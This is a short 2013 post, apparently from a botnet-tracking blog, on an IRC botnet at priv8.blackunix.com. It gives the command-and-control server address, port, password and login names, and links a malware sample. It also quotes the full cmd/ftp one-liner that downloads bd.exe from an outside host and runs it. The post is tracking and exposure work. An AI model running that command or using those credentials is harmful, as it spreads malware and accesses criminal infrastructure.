priv8.blackunix.com(irc botnet hosted in United States Seattle The Endurance International Group Inc.)

By Pig, March 20, 2013

Resolved : [priv8.blackunix.com] To [209.59.209.111]

Server: 209.59.209.111:5545
Server Password: ownz
Username: xcembmbr
Nickname: priv88qPCdHIIQo

The botnet spreads via ftp :
cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exit

sample :http://84c51bdf.ultrafiles.net

looks like he care about his bots because he gline everyone who try to join on the server
credits to Aliss the turkish guy for this

hosting info:
http://whois.domaintools.com/209.59.209.111

Categories: Uncategorized

Tags: irc bot

Previous poststrike-file-hosting.us (Betabot http botnet hosted by santrex.net)

Next postsmokenoke.com (Smoke loader hosted by neoweb.ru)

gigasbh.org(IRC Botnet Hosted In France Paris 1&1 Internet Ag)

89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)

gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)